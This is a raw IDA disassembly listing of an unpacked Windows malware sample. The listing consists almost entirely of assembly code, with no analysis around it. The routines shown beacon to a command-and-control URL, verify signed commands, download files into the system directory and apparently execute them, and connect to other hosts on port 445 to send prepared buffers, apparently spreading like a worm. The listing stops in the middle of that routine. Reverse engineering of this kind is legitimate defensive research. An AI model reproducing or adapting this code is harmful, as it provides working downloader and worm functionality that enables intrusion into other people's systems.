;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BD0EB2B833C0F0EEEA7239CADDE57731
; File Name : u:\work\bd0eb2b833c0f0eeea7239cadde57731_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 30900000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 30901000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30901000 dd 77DD590Bh ; DATA XREF: sub_309028B2+1A�r
dword_30901004 dd 77DD59F0h ; DATA XREF: sub_309028B2+38�r
dword_30901008 dd 77DD23D7h ; DATA XREF: sub_30902859+3E�r
dword_3090100C dd 77DD22EAh ; DATA XREF: sub_30902824+14�r
; sub_30902859+1D�r
dword_30901010 dd 77DD5C55h ; DATA XREF: sub_30902824+24�r
dword_30901014 dd 77DD189Ah ; DATA XREF: sub_30902824+2D�r
; sub_30902859+4E�r ...
dword_30901018 dd 77E2A571h ; DATA XREF: sub_30902383+183�r
dword_3090101C dd 77DE089Eh ; DATA XREF: sub_3090176B+17�r
dword_30901020 dd 77DE07A3h ; DATA XREF: sub_3090176B+30�r
dword_30901024 dd 77DE0D79h ; DATA XREF: sub_3090176B+4D�r
dword_30901028 dd 77DE0343h ; DATA XREF: sub_3090176B+5B�r
dword_3090102C dd 77DE0AF0h ; DATA XREF: sub_3090174F+8�r
dword_30901030 dd 77DE042Eh ; DATA XREF: sub_3090174F+12�r
dword_30901034 dd 77DDEBA2h ; DATA XREF: sub_30901700+6�r
dword_30901038 dd 77DE0BB2h ; DATA XREF: sub_30901700+3D�r
align 10h
dword_30901040 dd 77E79E34h ; DATA XREF: sub_30902C89+B�r
dword_30901044 dd 77E7980Ah ; DATA XREF: sub_30902C75+D�r
dword_30901048 dd 77E7A099h ; DATA XREF: sub_30902B37+17�r
dword_3090104C dd 77E76A2Eh ; DATA XREF: sub_30902B37+E9�r
dword_30901050 dd 77E6BD13h ; DATA XREF: sub_30902A6B+71�r
dword_30901054 dd 77E684C6h ; DATA XREF: sub_30902A6B+B0�r
dword_30901058 dd 77EBB1E7h ; DATA XREF: sub_30902CFC�r
dword_3090105C dd 77EBA595h ; DATA XREF: sub_30902CF6�r
dword_30901060 dd 77E616B4h ; DATA XREF: sub_30902905+9B�r
dword_30901064 dd 77EBA6E9h ; DATA XREF: sub_30902CF0�r
dword_30901068 dd 77E73167h ; DATA XREF: sub_309026E9+13�r
; sub_30902B37+8F�r
dword_3090106C dd 77E737DEh ; DATA XREF: sub_30902383+2D�r
dword_30901070 dd 77E79D5Bh ; DATA XREF: sub_3090236F+8�r
dword_30901074 dd 77E73628h ; DATA XREF: UPX0:30902317�r
; sub_30902A6B+F�r
dword_30901078 dd 77E79D8Ch ; DATA XREF: sub_309011A0+ED�r
dword_3090107C dd 77E77963h ; DATA XREF: sub_309011A0+B9�r
; sub_309011A0+F6�r ...
dword_30901080 dd 77E7A837h ; DATA XREF: sub_309011A0+8F�r
; sub_30902195+57�r
dword_30901084 dd 77E74672h ; DATA XREF: sub_309011A0+5A�r
; sub_30901422+64�r ...
dword_30901088 dd 77E74155h ; DATA XREF: sub_309011A0+3D�r
; sub_30902A6B+40�r
dword_3090108C dd 77E704FCh ; DATA XREF: sub_309011A0+37�r
; sub_30902A6B+1B�r
dword_30901090 dd 77E7513Ch ; DATA XREF: sub_309015C7+29�r
dword_30901094 dd 77E61BE6h ; DATA XREF: sub_3090169C+45�r
; sub_309017D2+16C�r ...
dword_30901098 dd 77E775F1h ; DATA XREF: sub_3090169C+2�r
dword_3090109C dd 77E73BEFh ; DATA XREF: sub_309017D2+4F�r
dword_309010A0 dd 77E79C90h ; DATA XREF: sub_30901D39+4D�r
dword_309010A4 dd 77E7A5FDh ; DATA XREF: sub_30901D39+13�r
; sub_30901DC1+2C�r
dword_309010A8 dd 77E805D8h ; DATA XREF: sub_30901D39+D�r
; sub_30902383+11C�r
dword_309010AC dd 77E61A90h ; DATA XREF: sub_30901DC1+BC�r
dword_309010B0 dd 77E706B7h ; DATA XREF: sub_30901DC1+8A�r
; sub_30902905+92�r
dword_309010B4 dd 77E79F93h ; DATA XREF: sub_30901DC1+26�r
; UPX0:30902307�r
dword_309010B8 dd 77E7751Ah ; DATA XREF: sub_30901ECC+12�r
dword_309010BC dd 77E7C2C4h ; DATA XREF: sub_30901EFA+8�r
dword_309010C0 dd 77E7AC37h ; DATA XREF: sub_30901F09+12�r
; sub_30901F23+12�r
dword_309010C4 dd 77E61BB8h ; DATA XREF: sub_30901F74+38�r
dword_309010C8 dd 77E74A3Bh ; DATA XREF: sub_3090201F+13�r
dword_309010CC dd 77E73AB3h ; DATA XREF: sub_3090201F+8�r
dword_309010D0 dd 77E73C49h ; DATA XREF: sub_3090204F+137�r
; sub_30902195+66�r ...
dword_309010D4 dd 77E777EFh ; DATA XREF: sub_3090204F+F4�r
; sub_3090259A+3F�r ...
dword_309010D8 dd 77E78B82h ; DATA XREF: sub_30902195+92�r
dword_309010DC dd 77E793EFh ; DATA XREF: sub_30902195+6E�r
dword_309010E0 dd 77E75CB5h ; DATA XREF: UPX0:30902341�r
; sub_30902A6B+C3�r
dword_309010E4 dd 77F5157Dh, 0 ; DATA XREF: UPX0:30902332�r
dword_309010EC dd 77C35280h ; DATA XREF: sub_30901ECC+22�r
dword_309010F0 dd 77C42E10h ; DATA XREF: sub_30902CB2�r
dword_309010F4 dd 77C43710h ; DATA XREF: sub_30902CAC�r
dword_309010F8 dd 77C43490h ; DATA XREF: sub_30902CA6�r
dword_309010FC dd 77C3528Dh ; DATA XREF: sub_3090169C+22�r
; sub_30901F44:loc_30901F55�r ...
; ---------------------------------------------------------------------------
loc_30901100: ; DATA XREF: UPX0:loc_30902CA0�r
mov al, 3Eh
retn
; ---------------------------------------------------------------------------
db 77h
dword_30901104 dd 77C43AB0h ; DATA XREF: sub_30901422+3C�r
; sub_3090204F:loc_30902080�r ...
dword_30901108 dd 77C43500h ; DATA XREF: sub_30901316+37�r
; sub_30901422+AA�r
align 10h
dword_30901110 dd 77D4BDCAh ; DATA XREF: sub_30901DC1+5D�r
dword_30901114 dd 77D4456Bh ; DATA XREF: sub_30901DC1+67�r
dword_30901118 dd 77D45CBCh ; DATA XREF: sub_30901DC1+7A�r
dword_3090111C dd 77D4C96Ah ; DATA XREF: sub_309015C7+5D�r
; sub_309015C7+77�r ...
dd 0
dword_30901124 dd 76214750h ; DATA XREF: sub_309011A0+A9�r
; sub_309015C7+9D�r
dword_30901128 dd 7620AFB6h ; DATA XREF: sub_309011A0+18�r
; sub_309015C7+89�r
dword_3090112C dd 76204E4Dh ; DATA XREF: sub_309015C7+C2�r
dword_30901130 dd 762211EFh ; DATA XREF: sub_30902009+8�r
; UPX0:30902779�r
dword_30901134 dd 7620BD61h ; DATA XREF: sub_309011A0+DB�r
; sub_309015C7+B0�r
dd 0
dword_3090113C dd 71AB41DAh ; DATA XREF: sub_309022D9+10�r
dword_30901140 dd 71AB3ECEh ; DATA XREF: sub_30902195+100�r
dword_30901144 dd 71AB5DE2h ; DATA XREF: sub_30902195+10D�r
dword_30901148 dd 71AB868Dh ; DATA XREF: sub_30902195+120�r
dword_3090114C dd 71AB32CAh ; DATA XREF: sub_30901FCA+C�r
dword_30901150 dd 71AB1740h ; DATA XREF: sub_30901FCA+17�r
dword_30901154 dd 71AB2BBFh ; DATA XREF: sub_30901FCA+25�r
dword_30901158 dd 71AB3C22h ; DATA XREF: sub_309017D2+2B�r
; sub_30902195+AC�r
dword_3090115C dd 71AB401Ch ; DATA XREF: sub_309017D2+44�r
; sub_309026E9+D�r
dword_30901160 dd 71AB1746h ; DATA XREF: sub_309017D2+147�r
; sub_30902195+F0�r
dword_30901164 dd 71AB3E5Dh ; DATA XREF: sub_309017D2+15D�r
dword_30901168 dd 71AB1AF4h ; DATA XREF: sub_309017D2+17B�r
; sub_3090204F+67�r ...
dword_3090116C dd 71AB5690h ; DATA XREF: sub_309017D2+1A4�r
; sub_309017D2+1D8�r ...
dword_30901170 dd 71AB8629h ; DATA XREF: sub_309017D2+550�r
; sub_3090204F+128�r
dword_30901174 dd 71AB1A6Dh ; DATA XREF: sub_309017D2+559�r
; sub_3090204F+12F�r
align 10h
dword_30901180 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_30901422+5�o
dd offset nullsub_1
align 10h
dword_30901190 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_30902383+5�o
dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309011A0 proc near ; CODE XREF: sub_30901422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_309011CB
push 1
jmp loc_30901261
; ---------------------------------------------------------------------------
loc_309011CB: ; CODE XREF: sub_309011A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3090108C ; GetSystemDirectoryA
mov edi, dword_30901088
lea eax, [ebp+var_110]
push offset dword_309041F8
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_30901084 ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_30901F44
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_309041F0
push eax
call edi ; lstrcat
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_30901080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_30901241
push 2
jmp short loc_30901261
; ---------------------------------------------------------------------------
loc_30901241: ; CODE XREF: sub_309011A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_30901124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_30901264
push [ebp+var_4]
call dword_3090107C ; CloseHandle
push 3
loc_30901261: ; CODE XREF: sub_309011A0+26�j
; sub_309011A0+9F�j
pop eax
jmp short loc_309012B5
; ---------------------------------------------------------------------------
loc_30901264: ; CODE XREF: sub_309011A0+B4�j
mov edi, 100000h
push edi
call sub_30902C75
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_30901134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_30901078 ; WriteFile
push [ebp+var_4]
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_30901F74
push ebx
call sub_30902C89
add esp, 0Ch
xor eax, eax
loc_309012B5: ; CODE XREF: sub_309011A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_309011A0 endp
; =============== S U B R O U T I N E =======================================
sub_309012BA proc near ; CODE XREF: sub_30901422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_309012D1: ; CODE XREF: sub_309012BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_309012D1
pop edi
pop esi
pop ebx
retn
sub_309012BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901316 proc near ; CODE XREF: sub_3090139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_30901349
add ebx, 1Ah
loc_30901349: ; CODE XREF: sub_30901316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_30901108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901373: ; CODE XREF: sub_30901316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901393: ; CODE XREF: sub_30901316+68�j
mov al, [ebp+arg_0]
loc_30901396: ; CODE XREF: sub_30901316+5B�j
; sub_30901316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090139B proc near ; CODE XREF: sub_30901422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_309013F8
mov edi, [ebp+arg_0]
push ebx
loc_309013B0: ; CODE XREF: sub_3090139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_30901316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_309013DC
cmp bl, 7Ah
jg short loc_309013DC
movsx esi, bl
sub esi, 61h
loc_309013DC: ; CODE XREF: sub_3090139B+34�j
; sub_3090139B+39�j
cmp bl, 41h
jl short loc_309013EC
cmp bl, 5Ah
jg short loc_309013EC
movsx esi, bl
sub esi, 41h
loc_309013EC: ; CODE XREF: sub_3090139B+44�j
; sub_3090139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_309013B0
pop ebx
jmp short loc_309013FB
; ---------------------------------------------------------------------------
loc_309013F8: ; CODE XREF: sub_3090139B+F�j
mov edi, [ebp+arg_0]
loc_309013FB: ; CODE XREF: sub_3090139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3090139B endp
; =============== S U B R O U T I N E =======================================
sub_30901402 proc near ; CODE XREF: sub_30901422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_30901406: ; CODE XREF: sub_30901402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_30901406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_30901402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901422 proc near ; CODE XREF: sub_309015C7+B7�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901180
push offset loc_30902CA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_30901104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_309015A8
add edi, 4
mov [ebp+var_130], edi
jz loc_309015A8
push edi
call dword_30901084 ; lstrlen
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_309015A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_309015A8
cmp ebx, 1Ah
jge loc_309015A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_30901108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_309015A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3090139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_309012BA
lea eax, [ebp+var_164]
push eax
call sub_30901402
add esp, 1Ch
cmp [esi], al
jnz short loc_309015A8
push 44h
push offset dword_30904000
lea eax, [ebp+var_124]
push eax
call sub_30901700
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_30901084 ; lstrlen
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3090176B
add esp, 18h
test eax, eax
jnz short loc_3090159B
cmp [ebp+var_174], edi
jz short loc_3090159B
lea eax, [ebp+var_11C]
push eax
call sub_309011A0
pop ecx
mov [ebp+var_128], edi
loc_3090159B: ; CODE XREF: sub_30901422+15C�j
; sub_30901422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3090174F
pop ecx
loc_309015A8: ; CODE XREF: sub_30901422+4E�j
; sub_30901422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309015C7 proc near ; CODE XREF: sub_3090169C+1B�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_30902C75
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_30901090 ; GetLocaleInfoA
xor ebx, ebx
cmp [ebp+arg_4], bl
jz short loc_3090162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_30904FBC
push dword_30904FD4
push offset aEeedtqfdbhbqod ; "eeedtqfdbhbqod"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3090111C ; wsprintfA
add esp, 1Ch
jmp short loc_30901647
; ---------------------------------------------------------------------------
loc_3090162F: ; CODE XREF: sub_309015C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3090111C ; wsprintfA
add esp, 0Ch
loc_30901647: ; CODE XREF: sub_309015C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_30901124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_30901134 ; InternetReadFile
push esi
call sub_30901422
push esi
call sub_30902C89
mov esi, dword_3090112C
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_309015C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3090169C proc near ; DATA XREF: sub_30902383+161�o
push esi
push edi
mov edi, dword_30901098
loc_309016A4: ; CODE XREF: sub_3090169C+62�j
xor esi, esi
loc_309016A6: ; CODE XREF: sub_3090169C+4E�j
inc esi
inc esi
mov al, byte_30904080[esi+esi*4]
push eax
push off_30904081[esi+esi*4]
call sub_309015C7
pop ecx
pop ecx
call dword_309010FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_30902039
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_30901094 ; Sleep
cmp esi, 16h
jb short loc_309016A6
push 0
push offset dword_30904FD4
call edi ; InterlockedExchange
push 0
push offset dword_30904FBC
call edi ; InterlockedExchange
jmp short loc_309016A4
sub_3090169C endp
; =============== S U B R O U T I N E =======================================
sub_30901700 proc near ; CODE XREF: sub_30901422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_30901034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3090172D
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3090172D
push 1
pop eax
jmp short loc_3090174B
; ---------------------------------------------------------------------------
loc_3090172D: ; CODE XREF: sub_30901700+19�j
; sub_30901700+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_30901038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3090174B: ; CODE XREF: sub_30901700+2B�j
pop edi
pop esi
pop ebx
retn
sub_30901700 endp
; =============== S U B R O U T I N E =======================================
sub_3090174F proc near ; CODE XREF: sub_30901422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3090102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_30901030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3090174F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090176B proc near ; CODE XREF: sub_30901422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3090101C ; CryptCreateHash
test eax, eax
jnz short loc_30901791
push 1
pop eax
jmp short loc_309017CE
; ---------------------------------------------------------------------------
loc_30901791: ; CODE XREF: sub_3090176B+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901020 ; CryptHashData
test eax, eax
jnz short loc_309017AA
push 2
pop edi
jmp short loc_309017C3
; ---------------------------------------------------------------------------
loc_309017AA: ; CODE XREF: sub_3090176B+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_30901024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_309017C3: ; CODE XREF: sub_3090176B+3D�j
push [ebp+arg_0]
call dword_30901028 ; CryptDestroyHash
mov eax, edi
loc_309017CE: ; CODE XREF: sub_3090176B+24�j
pop edi
pop esi
pop ebp
retn
sub_3090176B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309017D2 proc near ; CODE XREF: sub_30902536+36�p
; sub_3090259A+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_30902CC0
mov eax, dword_30904C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_30904C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_30901158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_30901D32
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3090115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3090109C ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_30904C78
push eax
call dword_3090111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_30901845: ; CODE XREF: sub_309017D2+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_30901845
push 60h
lea eax, [ebp+var_E4]
push offset dword_30904798
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902CAC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_30902CB2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_30902CAC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902CAC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902CAC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_30902CB2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_30902CA6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_30902CA6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_30901160 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_30901164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_30901D28
mov esi, dword_30901094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_30901168
push 89h
push offset dword_30904580
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0A8h
push offset dword_3090460C
push [ebp+var_4]
